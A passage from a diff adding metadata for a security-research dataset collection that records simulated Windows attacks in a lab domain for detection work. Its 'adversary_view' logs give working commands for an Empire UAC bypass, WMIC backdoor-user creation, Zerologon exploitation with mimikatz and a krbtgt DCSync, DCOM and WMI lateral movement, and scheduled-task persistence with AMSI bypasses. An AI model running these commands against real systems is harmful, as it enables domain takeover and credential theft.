+            "adversary_view": "(Empire: SP7B3U2X) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nKU86XWEL ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         5376   5/0.0    2020-09-04 07:07:17  http            \nSP7B3U2X ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         1376   5/0.0    2020-09-04 07:12:15  http            \n\n(Empire: agents) > interact SP7B3U2X\n(Empire: SP7B3U2X) > \n(Empire: SP7B3U2X) > usemodule privesc/bypassuac_fodhelper\n(Empire: powershell/privesc/bypassuac_fodhelper) > info\n\n              Name: Invoke-FodHelperBypass\n            Module: powershell/privesc/bypassuac_fodhelper\n        NeedsAdmin: False\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  Petr Medonos\n\nDescription:\n  Bypasses UAC by performing an registry modification for\n  FodHelper (based\n  onhttps://winscripting.blog/2017/05/12/first-entry-welcome-\n  and-uac-bypass/)\n\nComments:\n  https://winscripting.blog/2017/05/12/first-entry-welcome-\n  and-uac-bypass/\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        SP7B3U2X                  Agent to run module on.                 \n  Listener         True                                  Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/privesc/bypassuac_fodhelper) > set Listener http\n(Empire: powershell/privesc/bypassuac_fodhelper) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked SP7B3U2X to run TASK_CMD_JOB\n[*] Agent SP7B3U2X tasked with task ID 2\n[*] Tasked agent SP7B3U2X to run module powershell/privesc/bypassuac_fodhelper\n(Empire: powershell/privesc/bypassuac_fodhelper) > \nJob started: EHNK23\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent F2X6GE4R checked in\n[+] Initial agent F2X6GE4R from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to F2X6GE4R at 172.18.39.5\n\n(Empire: powershell/privesc/bypassuac_fodhelper) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nKU86XWEL ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         5376   5/0.0    2020-09-04 07:07:17  http            \nSP7B3U2X ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         1376   5/0.0    2020-09-04 07:30:33  http            \nF2X6GE4R ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         3936   5/0.0    2020-09-04 07:30:34  http            \n\n\n(Empire: agents) > interact F2X6GE4R\n(Empire: F2X6GE4R) > shell whoami\n[*] Tasked F2X6GE4R to run TASK_SHELL\n[*] Agent F2X6GE4R tasked with task ID 1\n(Empire: F2X6GE4R) > \ntheshire\\pgustavo\n..Command execution"
+        },
+        "references": [
+            "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:43.600930+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200914080546.yaml": {
+        "title": "Empire Remote WMIC Add User",
+        "id": "SDWIN-200914080546",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/09/14",
+        "modification_date": "2020/09/22",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "WMI IWbemServices ExecMethod",
+            "User Backdoor"
+        ],
+        "description": "This dataset represents an adversary remotely executing code via WMI to ad a backdoor user on the target system. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.",
+        "attack_mappings": [
+            {
+                "technique": "T1047",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0002",
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "shell",
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(Empire: agents) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent 6Z78CY25 checked in\n[+] Initial agent 6Z78CY25 from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to 6Z78CY25 at 172.18.39.5\nagents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nKFL6CMNZ ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7584   5/0.0    2020-09-14 11:33:59  http            \nYGBLW8EM ps 172.18.39.5     WORKSTATION5      *THESHIRE\\wardog        powershell         8924   5/0.0    2020-09-14 11:40:53  http            \nUBCKLYFA ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5412   5/0.0    2020-09-14 11:57:16  http            \n\n6Z78CY25 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         9564   5/0.0    2020-09-14 12:02:08  http            \n\n(Empire: agents) > interact 6Z78CY25\n(Empire: 6Z78CY25) > \n(Empire: 6Z78CY25) > shell wmic /node:WORKSTATION6 process call create \"net user /add backdoor [PLACEHOLDER]\"\n[*] Tasked 6Z78CY25 to run TASK_SHELL\n[*] Agent 6Z78CY25 tasked with task ID 1\n(Empire: 6Z78CY25) > \nExecuting (Win32_Process)->Create()\n\nMethod execution successful.\n\nOut Parameters:\ninstance of __PARAMETERS\n{\n  ProcessId = 7768;\n  ReturnValue = 0;\n};\n\n..Command execution completed.\n\n(Empire: 6Z78CY25) >"
+        },
+        "references": [
+            "https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:43.830931+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200916232559.yaml": {
+        "title": "Mimikatz Netlogon Unauthenticated NetrServerAuthenticate2",
+        "id": "SDWIN-200916232559",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/09/16",
+        "modification_date": "2020/09/16",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "CVE-2020-1472",
+            "Password Update",
+            "Netlogon Insecure AES-CFB8"
+        ],
+        "description": "This dataset represents adversaries leveraging a vulnerability (CVE-2020-1472) in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. This vulnerability was discovered by [@@SecuraBV](https://twitter.com/SecuraBV).",
+        "attack_mappings": [
+            {
+                "technique": "T1210",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "ShellCmd",
+                    "script": "https://github.com/cobbr/Covenant/blob/7555b19ffb9401c0e37094c25e404a640b1688d7/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"
+                },
+                {
+                    "type": "tool",
+                    "name": "mimikatz",
+                    "module": "lsadump",
+                    "script": "https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L23"
+                },
+                {
+                    "type": "tool",
+                    "name": "SharpZeroLogon",
+                    "module": "SharpZeroLogon",
+                    "script": "https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "Mimikatz Implementation (NetrServerAuthenticate2)\n=================================================\n\n(wardog) > ShellCmd /shellcommand:\"C:\\Users\\pgustavo\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe \\\"lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit\\\" exit\"\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 16 2020 12:02:22\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\n\nmimikatz(commandline) # lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit\n\nTarget : MORDORDC.theshire.local\nAccount: MORDORDC$\nType   : 6 (Server)\nMode   : exploit\n\nTrying to 'authenticate'...\n====================================================\n\nNetrServerAuthenticate2: 0x00000000\nNetrServerPasswordSet2 : 0x00000000\n\n* Authentication: OK -- vulnerable\n* Set password  : OK -- may be unstable\n\nmimikatz(commandline) # exit\n\nBye!\n\nDCSync Follow-up (Optional)\n(wardog) > ShellCmd /shellcommand:\"C:\\Users\\pgustavo\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe \\\"lsadump::dcsync /domain:theshire.local /dc:MORDORDC.theshire.local /user:krbtgt /authuser:MORDORDC$ /authdomain:theshire /authpassword:\\\\\"\\\\\" /authntlm\\\" exit\""
+        },
+        "references": [
+            "https://www.secura.com/blog/zero-logon",
+            "https://www.secura.com/pathtoimg.php?id=2055",
+            "https://twitter.com/gentilkiwi/status/1306178689630076929",
+            "https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon",
+            "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc#theGroupPolicy"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:44.033932+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200917174542.yaml": {
+        "title": "DCOM ExecuteExcel4macro",
+        "id": "SDWIN-200917174542",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/09/18",
+        "modification_date": "2020/09/18",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "DCOM"
+        ],
+        "description": "This dataset represents adversaries leveraging the COM Method ExecuteExcel4Macro over DCOM to execute Excel4 macros remotely",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": "003",
+                "tactics": [
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_dcom_executeexcel4macro_allowed.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_dcom_executeexcel4macro_allowed.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "ShellCmd",
+                    "script": "https://github.com/cobbr/Covenant/blob/7555b19ffb9401c0e37094c25e404a640b1688d7/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(wardog) > ShellCmd /shellcommand:\"C:\\Users\\pgustavo\\Desktop\\MoveExcel4.exe 172.18.39.6"
+        },
+        "references": [
+            "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-2-dcom/",
+            "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_dcom_executeexcel4macro_blocked.zip",
+            [
+                "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_dcom_executeexcel4macro_blocked.zip"
+            ]
+        ],
+        "mp_last_updated": "2022-01-08T01:49:44.237930+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200918145959.yaml": {
+        "title": "DCOM RegisterXLL",
+        "id": "SDWIN-200918145959",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/09/18",
+        "modification_date": "2020/09/18",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "DCOM"
+        ],
+        "description": "This dataset represents adversaries leveraging the COM Method RegisterXLL over DCOM to execute an XLL file remotely. The XLL file can exist on the target or externally in an UNC path such as \\\\SERVER\\FILES\\.",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": "003",
+                "tactics": [
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_dcom_registerxll.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_dcom_registerxll.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "ShellCmd",
+                    "script": "https://github.com/cobbr/Covenant/blob/7555b19ffb9401c0e37094c25e404a640b1688d7/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(wardog) > ShellCmd /shellcommand:\"C:\\Users\\pgustavo\\Desktop\\MoveExcelXLL.exe 172.18.39.6 C:\\\\programdata\\calc.xll"
+        },
+        "references": [
+            "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-2-dcom/"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:44.427930+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200921001437.yaml": {
+        "title": "Empire Invoke WMI",
+        "id": "SDWIN-200921001437",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/09/21",
+        "modification_date": "2020/09/22",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "WMI IWbemServices ExecMethod"
+        ],
+        "description": "This dataset represents an adversary remotely executing code via WMI. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.",
+        "attack_mappings": [
+            {
+                "technique": "T1047",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0002",
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "lateral_movement",
+                    "script": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/lateral_movement/invoke_wmi.py"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(Empire: agents) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            \n\nAWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         2228   5/0.0    2020-09-21 04:06:27  http            \n\n(Empire: agents) > interact AWTK7BX5\n(Empire: AWTK7BX5) > usemodule lateral_movement/invoke_wmi\n(Empire: powershell/lateral_movement/invoke_wmi) > set Listener http\n(Empire: powershell/lateral_movement/invoke_wmi) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_wmi) > info\n\n              Name: Invoke-WMI\n            Module: powershell/lateral_movement/invoke_wmi\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @harmj0y\n\nDescription:\n  Executes a stager on remote hosts using WMI.\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        AWTK7BX5                  Agent to run module on.                 \n  CredID           False                                 CredID from the store to use.           \n  ComputerName     True        WORKSTATION6.theshire.lo  Host[s] to execute the stager on, comma \n                              cal                       separated.                              \n  Listener         False       http                      Listener to use.                        \n  Command          False                                 Custom command to run.                  \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  UserName         False                                 [domain\\]username to use to execute     \n                                                        command.                                \n  Password         False                                 Password to use to execute command.     \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/lateral_movement/invoke_wmi) > execute\n[*] Tasked AWTK7BX5 to run TASK_CMD_WAIT\n[*] Agent AWTK7BX5 tasked with task ID 3\n[*] Tasked agent AWTK7BX5 to run module powershell/lateral_movement/invoke_wmi\n(Empire: powershell/lateral_movement/invoke_wmi) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent EHUNP61R checked in\n[+] Initial agent EHUNP61R from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to EHUNP61R at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_wmi) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            \n\nAWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         2228   5/0.0    2020-09-21 04:14:58  http            \nEHUNP61R ps 172.18.39.6     WORKSTATION6      *THESHIRE\\pgustavo      powershell         9804   5/0.0    2020-09-21 04:14:56  http            \n\n(Empire: agents) > interact EHUNP61R\n(Empire: EHUNP61R) > shell whoami\n[*] Tasked EHUNP61R to run TASK_SHELL\n[*] Agent EHUNP61R tasked with task ID 1\n(Empire: EHUNP61R) > \ntheshire\\pgustavo\n\n..Command execution completed.\n\n(Empire: EHUNP61R) >"
+        },
+        "references": [
+            "https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:47.991444+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200921175806.yaml": {
+        "title": "Empire Elevated Scheduled Tasks",
+        "id": "SDWIN-200921175806",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/09/21",
+        "modification_date": "2020/09/21",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Local Scheduled Tasks"
+        ],
+        "description": "This dataset represents adversaries creating and/or executing local scheduled tasks to maintain persistence in an environment.",
+        "attack_mappings": [
+            {
+                "technique": "T1053",
+                "sub-technique": "005",
+                "tactics": [
+                    "TA0003"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_schtasks_creation_execution_elevated_user.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "schtasks",
+                    "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "Empire: agents) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------          \n5LKFT4WY ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7172   5/0.0    2020-09-21 21:28:46  http            \nM43EPU58 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5088   5/0.0    2020-09-21 21:43:06  http            \n\n4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4092   5/0.0    2020-09-21 21:57:21  http            \n\n(Empire: agents) > interact 4SUZ8X62\n(Empire: 4SUZ8X62) > usemodule persistence/elevated/schtasks*\n(Empire: powershell/persistence/elevated/schtasks) > set AMSIBypass2 True\n(Empire: powershell/persistence/elevated/schtasks) > set TaskName MordorElevated\n(Empire: powershell/persistence/elevated/schtasks) > info\n\n              Name: Invoke-Schtasks\n            Module: powershell/persistence/elevated/schtasks\n        NeedsAdmin: True\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @mattifestation\n  @harmj0y\n\nDescription:\n  Persist a stager (or script) using schtasks running as\n  SYSTEM. This has a moderate detection/removal rating.\n\nComments:\n  https://github.com/mattifestation/PowerSploit/blob/master/Pe\n  rsistence/Persistence.psm1\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        4SUZ8X62                  Agent to run module on.                 \n  Listener         False       http                      Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       True                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  DailyTime        False                                 Daily time to trigger the script        \n                                                        (HH:mm).                                \n  IdleTime         False                                 User idle time (in minutes) to trigger  \n                                                        script.                                 \n  OnLogon          False       True                      Switch. Trigger script on user logon.   \n  TaskName         True        MordorElevated            Name to use for the schtask.            \n  RegPath          False       HKLM:\\Software\\Microsoft  Registry location to store the script   \n                              \\Network\\debug            code. Last element is the key name.     \n  ADSPath          False                                 Alternate-data-stream location to store \n                                                        the script code.                        \n  ExtFile          False                                 Use an external file for the payload    \n                                                        instead of a stager.                    \n  Cleanup          False                                 Switch. Cleanup the trigger and any     \n                                                        script from specified location.         \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/persistence/elevated/schtasks) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked 4SUZ8X62 to run TASK_CMD_WAIT\n[*] Agent 4SUZ8X62 tasked with task ID 1\n[*] Tasked agent 4SUZ8X62 to run module powershell/persistence/elevated/schtasks\n(Empire: powershell/persistence/elevated/schtasks) > \nSUCCESS: The scheduled task \"MordorElevated\" has successfully been created.\nSchtasks persistence established using listener http stored in HKLM:\\Software\\Microsoft\\Network\\debug with MordorElevated OnLogon trigger.\n\n(Empire: powershell/persistence/elevated/schtasks) > back\n(Empire: 4SUZ8X62) > shell shutdown /r\n[*] Tasked 4SUZ8X62 to run TASK_SHELL\n[*] Agent 4SUZ8X62 tasked with task ID 2\n(Empire: 4SUZ8X62) > \n..Command execution completed.\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent Y2ADR48N checked in\n[*] New agent D43KCT91 checked in\n[+] Initial agent Y2ADR48N from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to Y2ADR48N at 172.18.39.5\n[+] Initial agent D43KCT91 from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to D43KCT91 at 172.18.39.5\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------          \n5LKFT4WY ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7172   5/0.0    2020-09-21 21:28:46  http            \nM43EPU58 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5088   5/0.0    2020-09-21 21:43:06  http            \n\n4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http            \nY2ADR48N ps 172.18.39.5     WORKSTATION5      *THESHIRE\\SYSTEM        powershell         620    5/0.0    2020-09-21 22:01:50  http            \nD43KCT91 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\SYSTEM        powershell         636    5/0.0    2020-09-21 22:01:51  http            \n\n(Empire: agents) > "
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:48.251668+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200921230246.yaml": {
+        "title": "Rubeus Elevated ASKTGT CreateNetOnly",
+        "id": "SDWIN-200921230246",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/03/19",
+        "modification_date": "2020/09/21",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Over-Pass-The-Hash",
+            "Not Touching LSASS"
+        ],
+        "description": "This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching lsass.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "003",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_rubeus_asktgt_createnetonly.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_shell_rubeus_asktgt_createnetonly.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "shell",
+                    "script": null
+                },
+                {
+                    "type": "binary",
+                    "name": "Rubeus",
+                    "module": "asktgt",
+                    "script": "https://github.com/GhostPack/Rubeus"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
